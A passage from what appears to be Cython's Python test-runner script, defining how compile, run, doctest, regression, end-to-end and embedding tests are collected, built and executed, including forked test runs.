if sys.platform not in ['win32'] and self.add_embedded_test:
# Non-Windows makefile.
if [1 for selector in self.selectors if selector("embedded")] \
and not [1 for selector in self.exclude_selectors if selector("embedded")]:
suite.addTest(unittest.makeSuite(EmbedTest))
return suite
def handle_directory(self, path, context):
workdir = os.path.join(self.workdir, context)
if not os.path.exists(workdir):
os.makedirs(workdir)
suite = unittest.TestSuite()
filenames = list_unchanging_dir(path)
filenames.sort()
for filename in filenames:
filepath = os.path.join(path, filename)
module, ext = os.path.splitext(filename)
if ext not in ('.py', '.pyx', '.srctree'):
continue
if filename.startswith('.'):
continue # certain emacs backup files
if context == 'pyregr':
tags = defaultdict(list)
else:
tags = parse_tags(filepath)
fqmodule = "%s.%s" % (context, module)
if not [ 1 for match in self.selectors
if match(fqmodule, tags) ]:
continue
if self.exclude_selectors:
if [1 for match in self.exclude_selectors
if match(fqmodule, tags)]:
continue
mode = self.default_mode
if tags['mode']:
mode = tags['mode'][0]
elif context == 'pyregr':
mode = 'pyregr'
if ext == '.srctree':
if 'cpp' not in tags['tag'] or 'cpp' in self.languages:
suite.addTest(EndToEndTest(filepath, workdir,
self.cleanup_workdir, stats=self.stats,
capture=self.capture))
continue
# Choose the test suite.
if mode == 'pyregr':
if not filename.startswith('test_'):
continue
test_class = CythonPyregrTestCase
elif mode == 'run':
if module.startswith("test_"):
test_class = CythonUnitTestCase
else:
test_class = CythonRunTestCase
elif mode in ['compile', 'error']:
test_class = CythonCompileTestCase
else:
raise KeyError('Invalid test mode: ' + mode)
for test in self.build_tests(test_class, path, workdir,
module, mode == 'error', tags):
suite.addTest(test)
if mode == 'run' and ext == '.py' and not self.cython_only and not filename.startswith('test_'):
# additionally test file in real Python
min_py_ver = [
(int(pyver.group(1)), int(pyver.group(2)))
for pyver in map(re.compile(r'pure([0-9]+)[.]([0-9]+)').match, tags['tag'])
if pyver
]
if not min_py_ver or any(sys.version_info >= min_ver for min_ver in min_py_ver):
suite.addTest(PureDoctestTestCase(module, os.path.join(path, filename), tags, stats=self.stats))
return suite
def build_tests(self, test_class, path, workdir, module, expect_errors, tags):
warning_errors = 'werror' in tags['tag']
expect_warnings = 'warnings' in tags['tag']
if expect_errors:
if skip_c(tags) and 'cpp' in self.languages:
languages = ['cpp']
else:
languages = self.languages[:1]
else:
languages = self.languages
if skip_c(tags) and 'c' in languages:
languages = list(languages)
languages.remove('c')
elif 'no-cpp' in tags['tag'] and 'cpp' in self.languages:
languages = list(languages)
languages.remove('cpp')
language_levels = [2, 3] if 'all_language_levels' in tags['tag'] else [None]
pythran_dir = self.pythran_dir
if 'pythran' in tags['tag'] and not pythran_dir and 'cpp' in languages:
import pythran.config
try:
pythran_ext = pythran.config.make_extension(python=True)
except TypeError: # old pythran version syntax
pythran_ext = pythran.config.make_extension()
pythran_dir = pythran_ext['include_dirs'][0]
preparse_list = tags.get('preparse', ['id'])
tests = [ self.build_test(test_class, path, workdir, module, tags, language, language_level,
expect_errors, expect_warnings, warning_errors, preparse,
pythran_dir if language == "cpp" else None)
for language in languages
for preparse in preparse_list
for language_level in language_levels
]
return tests
def build_test(self, test_class, path, workdir, module, tags, language, language_level,
expect_errors, expect_warnings, warning_errors, preparse, pythran_dir):
language_workdir = os.path.join(workdir, language)
if not os.path.exists(language_workdir):
os.makedirs(language_workdir)
workdir = os.path.join(language_workdir, module)
if preparse != 'id':
workdir += '_%s' % (preparse,)
if language_level:
workdir += '_cy%d' % (language_level,)
return test_class(path, workdir, module, tags,
language=language,
preparse=preparse,
expect_errors=expect_errors,
expect_warnings=expect_warnings,
annotate=self.annotate,
cleanup_workdir=self.cleanup_workdir,
cleanup_sharedlibs=self.cleanup_sharedlibs,
cleanup_failures=self.cleanup_failures,
cython_only=self.cython_only,
fork=self.fork,
language_level=language_level or self.language_level,
warning_errors=warning_errors,
test_determinism=self.test_determinism,
common_utility_dir=self.common_utility_dir,
pythran_dir=pythran_dir,
stats=self.stats)
def skip_c(tags):
if 'cpp' in tags['tag']:
return True
# We don't want to create a distutils key in the
# dictionary so we check before looping.
if 'distutils' in tags:
for option in tags['distutils']:
splitted = option.split('=')
if len(splitted) == 2:
argument, value = splitted
if argument.strip() == 'language' and value.strip() == 'c++':
return True
return False
def filter_stderr(stderr_bytes):
"""
Filter annoying warnings from output.
"""
if b"Command line warning D9025" in stderr_bytes:
        # MSVC: cl : Command line warning D9025 : overriding '/Ox' with '/Od'
stderr_bytes = b'\n'.join(
line for line in stderr_bytes.splitlines()
if b"Command line warning D9025" not in line)
return stderr_bytes
class CythonCompileTestCase(unittest.TestCase):
def __init__(self, test_directory, workdir, module, tags, language='c', preparse='id',
expect_errors=False, expect_warnings=False, annotate=False, cleanup_workdir=True,
cleanup_sharedlibs=True, cleanup_failures=True, cython_only=False,
fork=True, language_level=2, warning_errors=False,
test_determinism=False,
common_utility_dir=None, pythran_dir=None, stats=None):
self.test_directory = test_directory
self.tags = tags
self.workdir = workdir
self.module = module
self.language = language
self.preparse = preparse
self.name = module if self.preparse == "id" else "%s_%s" % (module, preparse)
self.expect_errors = expect_errors
self.expect_warnings = expect_warnings
self.annotate = annotate
self.cleanup_workdir = cleanup_workdir
self.cleanup_sharedlibs = cleanup_sharedlibs
self.cleanup_failures = cleanup_failures
self.cython_only = cython_only
self.fork = fork
self.language_level = language_level
self.warning_errors = warning_errors
self.test_determinism = test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.stats = stats
unittest.TestCase.__init__(self)
def shortDescription(self):
return "compiling (%s%s%s) %s" % (
self.language,
"/cy2" if self.language_level == 2 else "/cy3" if self.language_level == 3 else "",
"/pythran" if self.pythran_dir is not None else "",
self.description_name()
)
def description_name(self):
return self.name
def setUp(self):
from Cython.Compiler import Options
self._saved_options = [
(name, getattr(Options, name))
for name in (
'warning_errors',
'clear_to_none',
'error_on_unknown_names',
'error_on_uninitialized',
# 'cache_builtins', # not currently supported due to incorrect global caching
)
]
self._saved_default_directives = list(Options.get_directive_defaults().items())
Options.warning_errors = self.warning_errors
if sys.version_info >= (3, 4):
Options._directive_defaults['autotestdict'] = False
if not os.path.exists(self.workdir):
os.makedirs(self.workdir)
if self.workdir not in sys.path:
sys.path.insert(0, self.workdir)
def tearDown(self):
from Cython.Compiler import Options
for name, value in self._saved_options:
setattr(Options, name, value)
Options._directive_defaults = dict(self._saved_default_directives)
unpatch_inspect_isfunction()
try:
sys.path.remove(self.workdir)
except ValueError:
pass
try:
del sys.modules[self.module]
except KeyError:
pass
cleanup = self.cleanup_failures or self.success
cleanup_c_files = WITH_CYTHON and self.cleanup_workdir and cleanup
cleanup_lib_files = self.cleanup_sharedlibs and cleanup
is_cygwin = sys.platform == 'cygwin'
if os.path.exists(self.workdir):
if cleanup_c_files and cleanup_lib_files and not is_cygwin:
shutil.rmtree(self.workdir, ignore_errors=True)
else:
for rmfile in os.listdir(self.workdir):
ext = os.path.splitext(rmfile)[1]
if not cleanup_c_files:
# Keep C, C++ files, header files, preprocessed sources
# and assembly sources (typically the .i and .s files
# are intentionally generated when -save-temps is given)
if ext in (".c", ".cpp", ".h", ".i", ".ii", ".s"):
continue
if ext == ".html" and rmfile.startswith(self.module):
continue
is_shared_obj = ext in (".so", ".dll")
if not cleanup_lib_files and is_shared_obj:
continue
try:
rmfile = os.path.join(self.workdir, rmfile)
if os.path.isdir(rmfile):
shutil.rmtree(rmfile, ignore_errors=True)
elif is_cygwin and is_shared_obj:
# Delete later
_to_clean.append(rmfile)
else:
os.remove(rmfile)
except IOError:
pass
if cleanup_c_files and cleanup_lib_files and is_cygwin:
# Finally, remove the work dir itself
_to_clean.append(self.workdir)
if cleanup_c_files and os.path.exists(self.workdir + '-again'):
shutil.rmtree(self.workdir + '-again', ignore_errors=True)
def runTest(self):
self.success = False
self.runCompileTest()
self.success = True
def runCompileTest(self):
return self.compile(
self.test_directory, self.module, self.workdir,
self.test_directory, self.expect_errors, self.expect_warnings, self.annotate)
def find_module_source_file(self, source_file):
if not os.path.exists(source_file):
source_file = source_file[:-1]
return source_file
def build_target_filename(self, module_name):
target = '%s.%s' % (module_name, self.language)
return target
def related_files(self, test_directory, module_name):
is_related = re.compile('%s_.*[.].*' % module_name).match
return [filename for filename in list_unchanging_dir(test_directory)
if is_related(filename)]
def copy_files(self, test_directory, target_directory, file_list):
if self.preparse and self.preparse != 'id':
preparse_func = globals()[self.preparse]
def copy(src, dest):
with open(src) as fin:
with open(dest, 'w') as fout:
fout.write(preparse_func(fin.read()))
else:
# use symlink on Unix, copy on Windows
try:
copy = os.symlink
except AttributeError:
copy = shutil.copy
join = os.path.join
for filename in file_list:
file_path = join(test_directory, filename)
if os.path.exists(file_path):
copy(file_path, join(target_directory, filename))
def source_files(self, workdir, module_name, file_list):
return ([self.build_target_filename(module_name)] +
[filename for filename in file_list
if not os.path.isfile(os.path.join(workdir, filename))])
def split_source_and_output(self, test_directory, module, workdir):
source_file = self.find_module_source_file(os.path.join(test_directory, module) + '.pyx')
from Cython.Utils import detect_opened_file_encoding
with io_open(source_file, 'rb') as f:
# encoding is passed to ErrorWriter but not used on the source
# since it is sometimes deliberately wrong
encoding = detect_opened_file_encoding(f, default=None)
with io_open(source_file, 'r', encoding='ISO-8859-1') as source_and_output:
error_writer = warnings_writer = None
out = io_open(os.path.join(workdir, module + os.path.splitext(source_file)[1]),
'w', encoding='ISO-8859-1')
try:
for line in source_and_output:
if line.startswith("_ERRORS"):
out.close()
out = error_writer = ErrorWriter(encoding=encoding)
elif line.startswith("_WARNINGS"):
out.close()
out = warnings_writer = ErrorWriter(encoding=encoding)
else:
out.write(line)
finally:
out.close()
return (error_writer.geterrors() if error_writer else [],
warnings_writer.geterrors() if warnings_writer else [])
def run_cython(self, test_directory, module, targetdir, incdir, annotate,
extra_compile_options=None):
include_dirs = INCLUDE_DIRS + [os.path.join(test_directory, '..', TEST_SUPPORT_DIR)]
if incdir:
include_dirs.append(incdir)
if self.preparse == 'id':
source = self.find_module_source_file(
os.path.join(test_directory, module + '.pyx'))
else:
self.copy_files(test_directory, targetdir, [module + '.pyx'])
source = os.path.join(targetdir, module + '.pyx')
target = os.path.join(targetdir, self.build_target_filename(module))
if extra_compile_options is None:
extra_compile_options = {}
if 'allow_unknown_names' in self.tags['tag']:
from Cython.Compiler import Options
Options.error_on_unknown_names = False
try:
CompilationOptions
except NameError:
from Cython.Compiler.Options import CompilationOptions
from Cython.Compiler.Main import compile as cython_compile
from Cython.Compiler.Options import default_options
common_utility_include_dir = self.common_utility_dir
options = CompilationOptions(
default_options,
include_path = include_dirs,
output_file = target,
annotate = annotate,
use_listing_file = False,
cplus = self.language == 'cpp',
np_pythran = self.pythran_dir is not None,
language_level = self.language_level,
generate_pxi = False,
evaluate_tree_assertions = True,
common_utility_include_dir = common_utility_include_dir,
**extra_compile_options
)
cython_compile(source, options=options,
full_module_name=module)
def run_distutils(self, test_directory, module, workdir, incdir,
extra_extension_args=None):
cwd = os.getcwd()
os.chdir(workdir)
try:
build_extension = build_ext(get_distutils_distro())
build_extension.include_dirs = INCLUDE_DIRS[:]
if incdir:
build_extension.include_dirs.append(incdir)
build_extension.finalize_options()
if COMPILER:
build_extension.compiler = COMPILER
ext_compile_flags = CFLAGS[:]
if build_extension.compiler == 'mingw32':
ext_compile_flags.append('-Wno-format')
if extra_extension_args is None:
extra_extension_args = {}
related_files = self.related_files(test_directory, module)
self.copy_files(test_directory, workdir, related_files)
from distutils.core import Extension
extension = Extension(
module,
sources=self.source_files(workdir, module, related_files),
extra_compile_args=ext_compile_flags,
**extra_extension_args
)
if self.language == 'cpp':
# Set the language now as the fixer might need it
extension.language = 'c++'
if 'distutils' in self.tags:
from Cython.Build.Dependencies import DistutilsInfo
from Cython.Utils import open_source_file
pyx_path = os.path.join(self.test_directory, self.module + ".pyx")
with open_source_file(pyx_path) as f:
DistutilsInfo(f).apply(extension)
if self.pythran_dir:
from Cython.Build.Dependencies import update_pythran_extension
update_pythran_extension(extension)
# Compile with -DCYTHON_CLINE_IN_TRACEBACK=1 unless we have
# the "traceback" tag
if 'traceback' not in self.tags['tag']:
extension.define_macros.append(("CYTHON_CLINE_IN_TRACEBACK", 1))
for matcher, fixer in list(EXT_EXTRAS.items()):
if isinstance(matcher, str):
# lazy init
del EXT_EXTRAS[matcher]
matcher = string_selector(matcher)
EXT_EXTRAS[matcher] = fixer
if matcher(module, self.tags):
newext = fixer(extension)
if newext is EXCLUDE_EXT:
return skip_test("Test '%s' excluded due to tags '%s'" % (
self.name, ', '.join(self.tags.get('tag', ''))))
extension = newext or extension
if self.language == 'cpp':
extension.language = 'c++'
if IS_PY2:
workdir = str(workdir) # work around type check in distutils that disallows unicode strings
build_extension.extensions = [extension]
build_extension.build_temp = workdir
build_extension.build_lib = workdir
build_extension.run()
finally:
os.chdir(cwd)
try:
get_ext_fullpath = build_extension.get_ext_fullpath
except AttributeError:
def get_ext_fullpath(ext_name, self=build_extension):
# copied from distutils.command.build_ext (missing in Py2.[45])
fullname = self.get_ext_fullname(ext_name)
modpath = fullname.split('.')
filename = self.get_ext_filename(modpath[-1])
if not self.inplace:
filename = os.path.join(*modpath[:-1]+[filename])
return os.path.join(self.build_lib, filename)
package = '.'.join(modpath[0:-1])
build_py = self.get_finalized_command('build_py')
package_dir = os.path.abspath(build_py.get_package_dir(package))
return os.path.join(package_dir, filename)
return get_ext_fullpath(module)
def compile(self, test_directory, module, workdir, incdir,
expect_errors, expect_warnings, annotate):
expected_errors = expected_warnings = errors = warnings = ()
if expect_errors or expect_warnings:
expected_errors, expected_warnings = self.split_source_and_output(
test_directory, module, workdir)
test_directory = workdir
if WITH_CYTHON:
old_stderr = sys.stderr
try:
sys.stderr = ErrorWriter()
with self.stats.time(self.name, self.language, 'cython'):
self.run_cython(test_directory, module, workdir, incdir, annotate)
errors, warnings = sys.stderr.getall()
finally:
sys.stderr = old_stderr
if self.test_determinism and not expect_errors:
workdir2 = workdir + '-again'
os.mkdir(workdir2)
self.run_cython(test_directory, module, workdir2, incdir, annotate)
diffs = []
for file in os.listdir(workdir2):
if (open(os.path.join(workdir, file)).read()
!= open(os.path.join(workdir2, file)).read()):
diffs.append(file)
os.system('diff -u %s/%s %s/%s > %s/%s.diff' % (
workdir, file,
workdir2, file,
workdir2, file))
if diffs:
self.fail('Nondeterministic file generation: %s' % ', '.join(diffs))
tostderr = sys.__stderr__.write
if expected_warnings or (expect_warnings and warnings):
self._match_output(expected_warnings, warnings, tostderr)
if 'cerror' in self.tags['tag']:
if errors:
tostderr("\n=== Expected C compile error ===\n")
tostderr("\n=== Got Cython errors: ===\n")
tostderr('\n'.join(errors))
tostderr('\n\n')
raise RuntimeError('should have generated extension code')
elif errors or expected_errors:
self._match_output(expected_errors, errors, tostderr)
return None
so_path = None
if not self.cython_only:
from Cython.Utils import captured_fd, print_bytes
from distutils.errors import CompileError, LinkError
show_output = True
get_stderr = get_stdout = None
try:
with captured_fd(1) as get_stdout:
with captured_fd(2) as get_stderr:
with self.stats.time(self.name, self.language, 'compile-%s' % self.language):
so_path = self.run_distutils(test_directory, module, workdir, incdir)
except Exception as exc:
if ('cerror' in self.tags['tag'] and
((get_stderr and get_stderr()) or
isinstance(exc, (CompileError, LinkError)))):
show_output = False # expected C compiler failure
else:
raise
else:
if 'cerror' in self.tags['tag']:
raise RuntimeError('should have failed C compile')
finally:
if show_output:
stdout = get_stdout and get_stdout().strip()
stderr = get_stderr and filter_stderr(get_stderr()).strip()
if so_path and not stderr:
# normal success case => ignore non-error compiler output
stdout = None
if stdout:
print_bytes(
stdout, header_text="\n=== C/C++ compiler output: =========\n",
end=None, file=sys.__stderr__)
if stderr:
print_bytes(
stderr, header_text="\n=== C/C++ compiler error output: ===\n",
end=None, file=sys.__stderr__)
if stdout or stderr:
tostderr("\n====================================\n")
return so_path
def _match_output(self, expected_output, actual_output, write):
try:
for expected, actual in zip(expected_output, actual_output):
self.assertEqual(expected, actual)
if len(actual_output) < len(expected_output):
expected = expected_output[len(actual_output)]
self.assertEqual(expected, None)
elif len(actual_output) > len(expected_output):
unexpected = actual_output[len(expected_output)]
self.assertEqual(None, unexpected)
except AssertionError:
write("\n=== Expected: ===\n")
write('\n'.join(expected_output))
write("\n\n=== Got: ===\n")
write('\n'.join(actual_output))
write('\n\n')
raise
class CythonRunTestCase(CythonCompileTestCase):
def setUp(self):
CythonCompileTestCase.setUp(self)
from Cython.Compiler import Options
Options.clear_to_none = False
def description_name(self):
return self.name if self.cython_only else "and running %s" % self.name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
result.startTest(self)
try:
self.setUp()
try:
self.success = False
ext_so_path = self.runCompileTest()
failures, errors, skipped = len(result.failures), len(result.errors), len(result.skipped)
if not self.cython_only and ext_so_path is not None:
self.run_tests(result, ext_so_path)
if failures == len(result.failures) and errors == len(result.errors):
# No new errors...
self.success = True
finally:
check_thread_termination()
except SkipTest as exc:
result.addSkip(self, str(exc))
result.stopTest(self)
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
def run_tests(self, result, ext_so_path):
self.run_doctests(self.module, result, ext_so_path)
def run_doctests(self, module_or_name, result, ext_so_path):
def run_test(result):
if isinstance(module_or_name, basestring):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(module_or_name, ext_so_path)
else:
module = module_or_name
tests = doctest.DocTestSuite(module)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
run_forked_test(result, run_test, self.shortDescription(), self.fork)
def run_forked_test(result, run_func, test_name, fork=True):
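    """
    Run 'run_func(result)' in a forked child process so the tested extension
    module does not stay loaded in the test runner.  The child pickles its
    partial test results to a temporary file, which the parent reads back and
    merges into 'result'.  Without fork support (or on Python 3), the test is
    simply run in-process.
    """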
if not fork or sys.version_info[0] >= 3 or not hasattr(os, 'fork'):
run_func(result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
return
# fork to make sure we do not keep the tested module loaded
result_handle, result_file = tempfile.mkstemp()
os.close(result_handle)
child_id = os.fork()
if not child_id:
result_code = 0
try:
try:
tests = partial_result = None
try:
partial_result = PartialTestResult(result)
run_func(partial_result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
except Exception:
result_code = 1
if partial_result is not None:
if tests is None:
# importing failed, try to fake a test class
tests = _FakeClass(
failureException=sys.exc_info()[1],
_shortDescription=test_name,
module_name=None)
partial_result.addError(tests, sys.exc_info())
if partial_result is not None:
with open(result_file, 'wb') as output:
pickle.dump(partial_result.data(), output)
except:
traceback.print_exc()
finally:
try: sys.stderr.flush()
except: pass
try: sys.stdout.flush()
except: pass
os._exit(result_code)
try:
cid, result_code = os.waitpid(child_id, 0)
module_name = test_name.split()[-1]
# os.waitpid returns the child's result code in the
# upper byte of result_code, and the signal it was
# killed by in the lower byte
if result_code & 255:
raise Exception(
"Tests in module '%s' were unexpectedly killed by signal %d, see test output for details." % (
module_name, result_code & 255))
result_code >>= 8
if result_code in (0,1):
try:
with open(result_file, 'rb') as f:
PartialTestResult.join_results(result, pickle.load(f))
except Exception:
raise Exception(
"Failed to load test result from test in module '%s' after exit status %d,"
" see test output for details." % (module_name, result_code))
if result_code:
raise Exception(
"Tests in module '%s' exited with status %d, see test output for details." % (
module_name, result_code))
finally:
try:
os.unlink(result_file)
except:
pass
class PureDoctestTestCase(unittest.TestCase):
def __init__(self, module_name, module_path, tags, stats=None):
self.tags = tags
self.module_name = self.name = module_name
self.module_path = module_path
self.stats = stats
unittest.TestCase.__init__(self, 'run')
def shortDescription(self):
return "running pure doctests in %s" % self.module_name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
loaded_module_name = 'pure_doctest__' + self.module_name
result.startTest(self)
try:
self.setUp()
import imp
with self.stats.time(self.name, 'py', 'pyimport'):
m = imp.load_source(loaded_module_name, self.module_path)
try:
with self.stats.time(self.name, 'py', 'pyrun'):
doctest.DocTestSuite(m).run(result)
finally:
del m
if loaded_module_name in sys.modules:
del sys.modules[loaded_module_name]
check_thread_termination()
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
if 'mypy' in self.tags['tag']:
try:
from mypy import api as mypy_api
except ImportError:
pass
else:
with self.stats.time(self.name, 'py', 'mypy'):
mypy_result = mypy_api.run([
self.module_path,
'--ignore-missing-imports',
'--follow-imports', 'skip',
])
if mypy_result[2]:
self.fail(mypy_result[0])
is_private_field = re.compile('^_[^_]').match
class _FakeClass(object):
def __init__(self, **kwargs):
self._shortDescription = kwargs.get('module_name')
self.__dict__.update(kwargs)
def shortDescription(self):
return self._shortDescription
try: # Py2.7+ and Py3.2+
from unittest.runner import _TextTestResult
except ImportError:
from unittest import _TextTestResult
class PartialTestResult(_TextTestResult):
def __init__(self, base_result):
_TextTestResult.__init__(
self, self._StringIO(), True,
base_result.dots + base_result.showAll*2)
def strip_error_results(self, results):
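        # Replace unpicklable attributes of the failed test cases with simple
        # placeholders so that the result data can be pickled and sent back
        # from the forked child process (see run_forked_test).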
for test_case, error in results:
for attr_name in filter(is_private_field, dir(test_case)):
if attr_name == '_dt_test':
test_case._dt_test = _FakeClass(
name=test_case._dt_test.name)
elif attr_name != '_shortDescription':
setattr(test_case, attr_name, None)
def data(self):
self.strip_error_results(self.failures)
self.strip_error_results(self.errors)
return (self.failures, self.errors, self.skipped, self.testsRun,
self.stream.getvalue())
def join_results(result, data):
"""Static method for merging the result back into the main
result object.
"""
failures, errors, skipped, tests_run, output = data
if output:
result.stream.write(output)
result.errors.extend(errors)
result.skipped.extend(skipped)
result.failures.extend(failures)
result.testsRun += tests_run
join_results = staticmethod(join_results)
class _StringIO(StringIO):
def writeln(self, line):
self.write("%s\n" % line)
class CythonUnitTestCase(CythonRunTestCase):
def shortDescription(self):
return "compiling (%s) tests in %s" % (self.language, self.description_name())
def run_tests(self, result, ext_so_path):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
tests = unittest.defaultTestLoader.loadTestsFromModule(module)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
class CythonPyregrTestCase(CythonRunTestCase):
def setUp(self):
CythonRunTestCase.setUp(self)
from Cython.Compiler import Options
Options.error_on_unknown_names = False
Options.error_on_uninitialized = False
Options._directive_defaults.update(dict(
binding=True, always_allow_keywords=True,
set_initial_path="SOURCEFILE"))
patch_inspect_isfunction()
def related_files(self, test_directory, module_name):
return _list_pyregr_data_files(test_directory)
def _run_unittest(self, result, *classes):
"""Run tests from unittest.TestCase-derived classes."""
valid_types = (unittest.TestSuite, unittest.TestCase)
suite = unittest.TestSuite()
for cls in classes:
if isinstance(cls, str):
if cls in sys.modules:
suite.addTest(unittest.findTestCases(sys.modules[cls]))
else:
raise ValueError("str arguments must be keys in sys.modules")
elif isinstance(cls, valid_types):
suite.addTest(cls)
else:
suite.addTest(unittest.makeSuite(cls))
with self.stats.time(self.name, self.language, 'run'):
suite.run(result)
def _run_doctest(self, result, module):
self.run_doctests(module, result, None)
def run_tests(self, result, ext_so_path):
try:
from test import support
except ImportError: # Python2.x
from test import test_support as support
def run_test(result):
def run_unittest(*classes):
return self._run_unittest(result, *classes)
def run_doctest(module, verbosity=None):
return self._run_doctest(result, module)
backup = (support.run_unittest, support.run_doctest)
support.run_unittest = run_unittest
support.run_doctest = run_doctest
try:
try:
sys.stdout.flush() # helps in case of crashes
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
sys.stdout.flush() # helps in case of crashes
if hasattr(module, 'test_main'):
# help 'doctest.DocFileTest' find the module path through frame inspection
fake_caller_module_globals = {
'module': module,
'__name__': module.__name__,
}
call_tests = eval(
'lambda: module.test_main()',
fake_caller_module_globals, fake_caller_module_globals)
call_tests()
sys.stdout.flush() # helps in case of crashes
except (unittest.SkipTest, support.ResourceDenied):
result.addSkip(self, 'ok')
finally:
support.run_unittest, support.run_doctest = backup
run_forked_test(result, run_test, self.shortDescription(), self.fork)
class TestCodeFormat(unittest.TestCase):
def __init__(self, cython_dir):
self.cython_dir = cython_dir
unittest.TestCase.__init__(self)
def runTest(self):
import pycodestyle
config_file = os.path.join(self.cython_dir, "setup.cfg")
if not os.path.exists(config_file):
config_file=os.path.join(os.path.dirname(__file__), "setup.cfg")
paths = []
for codedir in ['Cython', 'Demos', 'docs', 'pyximport', 'tests']:
paths += glob.glob(os.path.join(self.cython_dir, codedir + "/**/*.py"), recursive=True)
style = pycodestyle.StyleGuide(config_file=config_file)
print("") # Fix the first line of the report.
result = style.check_files(paths)
self.assertEqual(result.total_errors, 0, "Found code style errors.")
include_debugger = IS_CPYTHON
def collect_unittests(path, module_prefix, suite, selectors, exclude_selectors):
def file_matches(filename):
return filename.startswith("Test") and filename.endswith(".py")
def package_matches(dirname):
return dirname == "Tests"
loader = unittest.TestLoader()
if include_debugger:
skipped_dirs = []
else:
skipped_dirs = ['Cython' + os.path.sep + 'Debugger' + os.path.sep]
for dirpath, dirnames, filenames in os.walk(path):
if dirpath != path and "__init__.py" not in filenames:
skipped_dirs.append(dirpath + os.path.sep)
continue
skip = False
for dir in skipped_dirs:
if dirpath.startswith(dir):
skip = True
if skip:
continue
parentname = os.path.split(dirpath)[-1]
if package_matches(parentname):
for f in filenames:
if file_matches(f):
filepath = os.path.join(dirpath, f)[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not any(1 for match in selectors if match(modulename)):
continue
if any(1 for match in exclude_selectors if match(modulename)):
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
suite.addTests([loader.loadTestsFromModule(module)])
def collect_doctests(path, module_prefix, suite, selectors, exclude_selectors):
def package_matches(dirname):
if dirname == 'Debugger' and not include_debugger:
return False
return dirname not in ("Mac", "Distutils", "Plex", "Tempita")
def file_matches(filename):
filename, ext = os.path.splitext(filename)
blacklist = ['libcython', 'libpython', 'test_libcython_in_gdb',
'TestLibCython']
return (ext == '.py' and not
'~' in filename and not
'#' in filename and not
filename.startswith('.') and not
filename in blacklist)
import doctest
for dirpath, dirnames, filenames in os.walk(path):
for dir in list(dirnames):
if not package_matches(dir):
dirnames.remove(dir)
for f in filenames:
if file_matches(f):
if not f.endswith('.py'): continue
filepath = os.path.join(dirpath, f)
if os.path.getsize(filepath) == 0: continue
filepath = filepath[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not [ 1 for match in selectors if match(modulename) ]:
continue
if [ 1 for match in exclude_selectors if match(modulename) ]:
continue
if 'in_gdb' in modulename:
# These should only be imported from gdb.
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
if hasattr(module, "__doc__") or hasattr(module, "__test__"):
try:
suite.addTest(doctest.DocTestSuite(module))
except ValueError: # no tests
pass
class EndToEndTest(unittest.TestCase):
"""
This is a test of build/*.srctree files, where srctree defines a full
directory structure and its header gives a list of commands to run.
"""
cython_root = os.path.dirname(os.path.abspath(__file__))
def __init__(self, treefile, workdir, cleanup_workdir=True, stats=None,
capture=True):
self.name = os.path.splitext(os.path.basename(treefile))[0]
self.treefile = treefile
self.workdir = os.path.join(workdir, self.name)
self.cleanup_workdir = cleanup_workdir
self.stats = stats
self.capture = capture
cython_syspath = [self.cython_root]
for path in sys.path:
if path.startswith(self.cython_root) and path not in cython_syspath:
# Py3 installation and refnanny build prepend their
# fixed paths to sys.path => prefer that over the
# generic one (cython_root itself goes last)
cython_syspath.append(path)
self.cython_syspath = os.pathsep.join(cython_syspath[::-1])
unittest.TestCase.__init__(self)
def shortDescription(self):
return "End-to-end %s" % self.name
def setUp(self):
from Cython.TestUtils import unpack_source_tree
_, self.commands = unpack_source_tree(self.treefile, self.workdir, self.cython_root)
self.old_dir = os.getcwd()
os.chdir(self.workdir)
def tearDown(self):
if self.cleanup_workdir:
for trial in range(5):
try:
shutil.rmtree(self.workdir)
except OSError:
time.sleep(0.1)
else:
break
os.chdir(self.old_dir)
def _try_decode(self, content):
try:
return content.decode()
except UnicodeDecodeError:
return content.decode('iso-8859-1')
def runTest(self):
self.success = False
old_path = os.environ.get('PYTHONPATH')
env = dict(os.environ)
new_path = self.cython_syspath
if old_path:
new_path = new_path + os.pathsep + self.workdir + os.pathsep + old_path
env['PYTHONPATH'] = new_path
if not env.get("PYTHONIOENCODING"):
env["PYTHONIOENCODING"] = sys.stdout.encoding or sys.getdefaultencoding()
cmd = []
out = []
err = []
for command_no, command in enumerate(self.commands, 1):
with self.stats.time('%s(%d)' % (self.name, command_no), 'c',
'etoe-build' if 'setup.py' in command else 'etoe-run'):
if self.capture:
p = subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE, env=env)
_out, _err = p.communicate()
res = p.returncode
else:
p = subprocess.call(command, env=env)
_out, _err = b'', b''
res = p
cmd.append(command)
out.append(_out)
err.append(_err)
if res != 0:
for c, o, e in zip(cmd, out, err):
sys.stderr.write("%s\n%s\n%s\n\n" % (
c, self._try_decode(o), self._try_decode(e)))
self.assertEqual(0, res, "non-zero exit status")
self.success = True
# TODO: Support cython_freeze needed here as well.
# TODO: Windows support.
class EmbedTest(unittest.TestCase):
working_dir = "Demos/embed"
def setUp(self):
self.old_dir = os.getcwd()
os.chdir(self.working_dir)
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
def tearDown(self):
try:
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
except:
pass
os.chdir(self.old_dir)
def test_embed(self):
libname = sysconfig.get_config_var('LIBRARY')
libdir = sysconfig.get_config_var('LIBDIR')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(os.path.dirname(sys.executable), '..', 'lib')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
